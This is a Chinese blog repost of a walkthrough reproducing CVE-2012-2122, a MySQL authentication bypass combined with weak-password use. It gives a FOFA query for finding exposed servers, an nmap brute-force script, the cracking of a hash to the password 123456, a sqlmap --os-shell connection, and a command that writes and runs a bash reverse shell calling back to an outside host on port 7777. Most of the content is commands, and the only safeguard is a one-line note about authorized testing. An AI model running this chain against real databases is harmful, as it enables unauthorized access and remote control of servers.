-CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现-CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

MySQL是一个关系型数据库管理系统,由瑞典MySQL AB公司开发,属于Oracle 旗下产品。MySQL是最流行的关系型数据库管理系统之一,在WEB应用方面,MySQL是最好的RDBMS(Relational Database Management System,关系数据库管理系统) 应用软件之一。当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞。

图片[1]--CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用-安全小天地

0x03 漏洞复现

漏洞影响:所有的Mariadb和mysql版本:5.1.61、5.0.11、5.3.5、5.5.22

FOFA: app=”mysql”

1.nmap使用mysql-vuln-cve2012-2122爆破Mysql,得到一个mysql5加密值

6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9

nmap -sV -T4 -p3306  --script=mysql-vuln-cve2012-2122 x.x.x.x
图片[2]--CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用-安全小天地

2.到CMD5解密,得到密码为123456,即账号:root 密码:123456

CMD5地址为:https://www.cmd5.com/

图片[3]--CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用-安全小天地

3.利用sqlmap连接,连接成功,权限为mysql

<strong>sqlmap -d \"mysql://root:123456@x.x.x.x:3306/test\" --os-shell --flush-session</strong>
图片[4]--CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用-安全小天地

4.写入反弹shell的sh脚本到tmp目录,且赋予可执行权限,写入成功

echo \"bash -i >& /dev/tcp/x.x.x.x/7777 0>&1\" > /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh
图片[5]--CVE-2012-2122 Mysql 身份认证绕过漏洞/mysql弱口令利用-安全小天地
(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)
------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发
头像
善语结善缘,恶语伤人心
提交
头像

昵称

取消
昵称常用语 夸夸
夸夸
还有吗!没看够!
表情图片

    暂无评论内容